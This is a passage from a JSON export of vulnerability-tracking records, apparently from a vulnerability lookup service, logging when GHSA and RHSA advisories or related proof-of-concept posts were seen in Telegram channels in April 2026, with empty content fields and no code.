"GHSA-37FQ-47QJ-6J5J", "type": "published-proof-of-concept", "source": "Telegram/zJs9VhJAI5JOvrL4hzeWnrOleMDgHArbbwhOuzjaL80cudA", "content": "", "creation_timestamp": "2026-04-02T19:27:20.000000Z"}, {"uuid": "f256fd48-7b1b-45ee-b789-422d15ebd4e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H6C8-CWW8-35HF", "type": "published-proof-of-concept", "source": "Telegram/v04jgzFs_dRRg0faEVT7MCYFvzaiVamBu-2mRXh2qzS6BJs", "content": "", "creation_timestamp": "2026-04-14T03:16:35.000000Z"}, {"uuid": "c20b9018-2b9b-4eef-9449-363f42403f1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R2PG-R6H7-CRF3", "type": "seen", "source": "Telegram/VN5qpdZvC1XQa0kocwrxs34zDP5KgO9Hh_vqtOghSHVfgqA", "content": "", "creation_timestamp": "2026-04-14T05:17:21.000000Z"}, {"uuid": "fa65194e-7f68-487c-bc9d-069a45905f09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "fdc4a5e5-bac2-471d-8c83-b43d35879309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "07f19950-6673-4132-bfc2-6a1c09b0c774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "77cca350-cd6e-4b11-9251-09e108660182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "efc0162b-1704-42c1-9686-f2dbd8ff0b7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "e6d40f30-da49-4536-bdb6-fda1d2b6f487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HX87-8754-XVH4", "type": "seen", "source": "Telegram/UYy9QXiDWOzFY7CBVA8MS0Xr-No70LVttPhqPBLktKhMGyQ", "content": "", "creation_timestamp": "2026-04-09T17:23:27.000000Z"}, {"uuid": "42484a6a-bab8-4705-a6e3-96bdb5452629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCC6-F9V6-F7JW", "type": "seen", "source": "Telegram/UYy9QXiDWOzFY7CBVA8MS0Xr-No70LVttPhqPBLktKhMGyQ", "content": "", "creation_timestamp": "2026-04-09T17:23:27.000000Z"}, {"uuid": "049a5d9b-ca1c-4260-a0fa-c2b5f4854dfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GGG-H7PH-26QR", "type": "published-proof-of-concept", "source": "Telegram/k5gHuzl44UiSjs6WvJKw2ZASZi-uE6KFE3zi6HenZzrhwHY", "content": "", "creation_timestamp": "2026-04-09T19:22:59.000000Z"}, {"uuid": "e99d5b3f-f2fd-4ced-9783-d222550bfece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "69467b03-1b47-43dc-84ea-1a0bbb60f7c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "e380f097-0e4d-4b10-b0fb-492344e95034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "17cdc97d-0c4e-4771-9a65-e952e4bb5abe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "0d75068b-7479-4134-ba73-a12224c8a4d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3976", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "f306d5e2-6be1-4032-91dc-a71a5dfad631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "1752e310-1a0d-4124-91aa-a8e2fe97c4da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "eae8b39b-4020-4bdb-bbec-31abfd2c2add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "ce2f1a40-1eb3-4074-88a9-1ba07c9bb6e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "5a137b63-15a2-44e1-bafd-99877de201d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "4b2982f9-b41a-41ca-98b2-ece4822c7b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3976", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "4821240c-a64e-4dc8-b1db-b84b5ab54d73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQ5J-55VX-WQ8J", "type": "seen", "source": "Telegram/-ctGArBxkphl-MxNFcCeUWXIJh7Segfx9XDjUoG-mXB9WRY", "content": "", "creation_timestamp": "2026-04-14T11:16:55.000000Z"}, {"uuid": "6d23d822-f5a0-413c-959d-750deba4f08d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-355H-QMC2-WPWF", "type": "published-proof-of-concept", "source": "Telegram/cLVBfu0wN-_KDy7vSZP2Uw7mBDsIGZ8mzZODmv4ph0BNeQs", "content": "", "creation_timestamp": "2026-04-14T13:15:45.000000Z"}, {"uuid": "e4a94dbb-efaa-4c78-b25a-09d04fc15735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "42af796b-050c-4f81-9ee3-dbf2ea392500", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7458", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "e90cfdbd-135a-4477-8ad1-31342c761879", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "b057eb4e-fdbb-48ef-9a8e-5d60a2ab276b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "0dd89319-3184-479e-8d6b-ece895e6d58e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "38fad224-d133-4263-a790-f5115f1dfa2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "0e76092a-1b1d-45e6-85e3-69c3d3b2cb4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "53a3913b-0472-4fc4-a836-d19050b245d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P65-76G6-3W7R", "type": "published-proof-of-concept", "source": "Telegram/vDxpsGfJbQiyRhua_845taBzP9STG0qUjRmnheADKQhDWFU", "content": "", "creation_timestamp": "2026-04-06T17:30:35.000000Z"}, {"uuid": "7f076a5f-d00f-45b5-82f7-e378c2e8ab44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3M49-QF92-VCCR", "type": "published-proof-of-concept", "source": "Telegram/vDxpsGfJbQiyRhua_845taBzP9STG0qUjRmnheADKQhDWFU", "content": "", "creation_timestamp": "2026-04-06T17:30:35.000000Z"}, {"uuid": "2158d1b7-d0de-412f-9ba8-44e61a2da12e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-346P-QJ3V-9RXJ", "type": "published-proof-of-concept", "source": "Telegram/vDxpsGfJbQiyRhua_845taBzP9STG0qUjRmnheADKQhDWFU", "content": "", "creation_timestamp": "2026-04-06T17:30:35.000000Z"}, {"uuid": "52f3595c-49ab-4193-a4f5-c454b35c0793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79PG-554G-RW82", "type": "published-proof-of-concept", "source": "Telegram/vDxpsGfJbQiyRhua_845taBzP9STG0qUjRmnheADKQhDWFU", "content": "", "creation_timestamp": "2026-04-06T17:30:35.000000Z"}, {"uuid": "824804ca-9e4f-43d0-b53b-d047ac8e7618", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHCH-WCM9-F9CP", "type": "published-proof-of-concept", "source": "Telegram/vDxpsGfJbQiyRhua_845taBzP9STG0qUjRmnheADKQhDWFU", "content": "", "creation_timestamp": "2026-04-06T17:30:35.000000Z"}, {"uuid": "988f9e2b-b200-40cf-8839-a01e55d69b36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCXQ-FJP3-R752", "type": "published-proof-of-concept", "source": "Telegram/FD_1XDPHxmeq4cPhZAsKic1sVLDUHGuIRMXt4NvJcjYqn2U", "content": "", "creation_timestamp": "2026-04-06T19:28:12.000000Z"}, {"uuid": "978b3a72-9755-459e-9d6c-fdeac91d4326", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-349C-2H2F-MXF6", "type": "published-proof-of-concept", "source": "Telegram/k5gHuzl44UiSjs6WvJKw2ZASZi-uE6KFE3zi6HenZzrhwHY", "content": "", "creation_timestamp": "2026-04-09T19:22:59.000000Z"}, {"uuid": "5ef05260-1ded-4b12-a969-be5e8d619d23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HWR4-MQ23-WCV5", "type": "published-proof-of-concept", "source": "Telegram/k5gHuzl44UiSjs6WvJKw2ZASZi-uE6KFE3zi6HenZzrhwHY", "content": "", "creation_timestamp": "2026-04-09T19:22:59.000000Z"}, {"uuid": "d40c98fc-ad57-40ce-a1d4-fdeade09c2f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QW2M-4PQF-RMPP", "type": "seen", "source": "Telegram/_n5Nok_-XlRHEre5O89LvYLplT02rw8wZYprnGR4USXlLgM", "content": "", "creation_timestamp": "2026-04-06T17:32:38.000000Z"}, {"uuid": "a3b37002-6480-48bd-960b-512b210f480c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GM9M-GWC4-HWGP", "type": "seen", "source": "Telegram/_n5Nok_-XlRHEre5O89LvYLplT02rw8wZYprnGR4USXlLgM", "content": "", "creation_timestamp": "2026-04-06T17:32:38.000000Z"}, {"uuid": "e5bf6402-6a9f-49d0-8951-42d61ea99662", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VX58-FWWQ-5G8J", "type": "seen", "source": "Telegram/EKU3EO0GNZYVnupMzIC7jT0Kx1d9wsZeA8MakquUKITh-r8", "content": "", "creation_timestamp": "2026-04-02T22:22:55.000000Z"}, {"uuid": "d65d4ece-c6e3-4551-96ac-de7f8a92d2a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9M89-5JW7-Q5CR", "type": "seen", "source": "Telegram/EKU3EO0GNZYVnupMzIC7jT0Kx1d9wsZeA8MakquUKITh-r8", "content": "", "creation_timestamp": "2026-04-02T22:22:55.000000Z"}, {"uuid": "0fc5b4b1-36d8-4efd-94cb-6d24e9c18d59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JV9R-JW2F-RHRF", "type": "seen", "source": "Telegram/opWNLDaOjT2KiHYbiGpHGLhTmz3SmMLK1wCf8I-JAwAiArQ", "content": "", "creation_timestamp": "2026-04-09T19:23:08.000000Z"}, {"uuid": "000007df-a848-4d25-8df4-4bfc1fe2eb0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W95V-4H65-J455", "type": "published-proof-of-concept", "source": "Telegram/RnbO6h7rE-8F1e1uXIlS73R4kRuAIo63byQ11pUP09Fz6LA", "content": "", "creation_timestamp": "2026-04-09T23:29:26.000000Z"}, {"uuid": "ac7724d6-3a31-4758-bc09-076a8b39c1d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FRJ-8Q3M-XHGM", "type": "seen", "source": "Telegram/1cCualj_PQDoYUsDnolnQpk7NGC4b1xwJPWps9hRWMxLLCE", "content": "", "creation_timestamp": "2026-04-09T23:30:43.000000Z"}, {"uuid": "a7eef99b-7089-45ac-8abc-4387a0fa315e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5FQ-8965-C969", "type": "seen", "source": "Telegram/lg_uE38htKCDsrEIH_zbRJLgqsKSDV6aHHtfYRxKZkwP2V8", "content": "", "creation_timestamp": "2026-04-10T15:17:16.000000Z"}, {"uuid": "a0d53dfc-ec2d-48a4-b8aa-5faddb981422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WGG-7R2P-CMQX", "type": "seen", "source": "Telegram/lg_uE38htKCDsrEIH_zbRJLgqsKSDV6aHHtfYRxKZkwP2V8", "content": "", "creation_timestamp": "2026-04-10T15:17:16.000000Z"}, {"uuid": "9b70418c-0f1a-4e5a-bffd-c789ec805cb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RV7-9FHX-J654", "type": "seen", "source": "Telegram/FB_FE1jRDxJPr8K8_KBUfFYtlwI9wezi1OF7LpQ32t_R7vo", "content": "", "creation_timestamp": "2026-04-10T21:24:11.000000Z"}, {"uuid": "076f14e2-a15d-48e6-bd82-b05a39d0781c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HP4W-JMWC-PG7W", "type": "seen", "source": "Telegram/FB_FE1jRDxJPr8K8_KBUfFYtlwI9wezi1OF7LpQ32t_R7vo", "content": "", "creation_timestamp": "2026-04-10T21:24:11.000000Z"}, {"uuid": "41f67a84-29d9-4f1a-84f5-30d80cca4a39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHFX-PWWG-945V", "type": "seen", "source": "Telegram/FB_FE1jRDxJPr8K8_KBUfFYtlwI9wezi1OF7LpQ32t_R7vo", "content": "", "creation_timestamp": "2026-04-10T21:24:11.000000Z"}, {"uuid": "99710e3e-e98f-4e9f-9d11-ef6aa6ea5dce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q3H9-M34W-H76F", "type": "published-proof-of-concept", "source": "Telegram/61DYlWTca6IkcT_FpN2RYBtwr9MKXFEKysLP63-1xRoUERI", "content": "", "creation_timestamp": "2026-04-13T19:19:04.000000Z"}, {"uuid": "59d767bc-7295-446a-b826-a8c23e89205b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCXM-M3JX-F287", "type": "published-proof-of-concept", "source": "Telegram/61DYlWTca6IkcT_FpN2RYBtwr9MKXFEKysLP63-1xRoUERI", "content": "", "creation_timestamp": "2026-04-13T19:19:04.000000Z"}, {"uuid": "ce888e54-1d3b-4d92-a39e-18058bc05d62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8452-54WP-RMV6", "type": "published-proof-of-concept", "source": "Telegram/nKWnjkmkE0KCaEQFUYveErvXFFBY-D0bq9FDU2ZECdeJKSY", "content": "", "creation_timestamp": "2026-04-10T19:30:17.000000Z"}, {"uuid": "df25cce1-638f-4d05-9ca1-cc7a03e6b361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-529F-9QWM-9628", "type": "published-proof-of-concept", "source": "Telegram/nKWnjkmkE0KCaEQFUYveErvXFFBY-D0bq9FDU2ZECdeJKSY", "content": "", "creation_timestamp": "2026-04-10T19:30:17.000000Z"}, {"uuid": "bff3ee98-8881-40a5-9037-1b4e25925552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-39PP-XP36-Q6MG", "type": "published-proof-of-concept", "source": "Telegram/-hUuw8aTFVWSQYPf3qEKqcT3Zmmt4K4bisrN5sFAqL07rbc", "content": "", "creation_timestamp": "2026-04-10T19:30:36.000000Z"}, {"uuid": "5212057a-e88a-4ab2-a0e6-7536b0d78586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3MH-3MPG-37HW", "type": "published-proof-of-concept", "source": "Telegram/-hUuw8aTFVWSQYPf3qEKqcT3Zmmt4K4bisrN5sFAqL07rbc", "content": "", "creation_timestamp": "2026-04-10T19:30:36.000000Z"}, {"uuid": "bdaf0002-3a21-4333-ad3b-efff01858ebf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CXMW-P77Q-WCHG", "type": "published-proof-of-concept", "source": "Telegram/-hUuw8aTFVWSQYPf3qEKqcT3Zmmt4K4bisrN5sFAqL07rbc", "content": "", "creation_timestamp": "2026-04-10T19:30:36.000000Z"}, {"uuid": "5796b4d1-dc8c-44df-9e95-4f38f7d70049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557G-2W66-GPMF", "type": "seen", "source": "Telegram/FB_FE1jRDxJPr8K8_KBUfFYtlwI9wezi1OF7LpQ32t_R7vo", "content": "", "creation_timestamp": "2026-04-10T21:24:11.000000Z"}, {"uuid": "9d05b488-11f4-4b62-838d-02e61be18ddf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34W8-5J2V-H6WW", "type": "seen", "source": "Telegram/EoubZoYE34cwfOKYIK3rDqJUepVUHxboU2AFga2-YHkJtiw", "content": "", "creation_timestamp": "2026-04-10T21:24:33.000000Z"}, {"uuid": "5118e352-6448-40b5-96d3-be3cfe8f610e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MW4F-CF22-QPCJ", "type": "seen", "source": "Telegram/EoubZoYE34cwfOKYIK3rDqJUepVUHxboU2AFga2-YHkJtiw", "content": "", "creation_timestamp": "2026-04-10T21:24:33.000000Z"}, {"uuid": "5b9386ea-29ec-4237-a5d5-42e510b7a3c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "6364b25a-d08f-44d6-8b45-4a433a8df901", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "1ecb255d-8a29-4930-ae46-1500b06da0ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "0a33dc73-7776-4d7d-acd8-930c8aaefee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3976", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "9c52aca1-6bed-46c7-8b3e-55ff14ff7f1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "e6028a69-3915-4da9-83c8-87ed313d9dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7458", "type": "seen", "source": 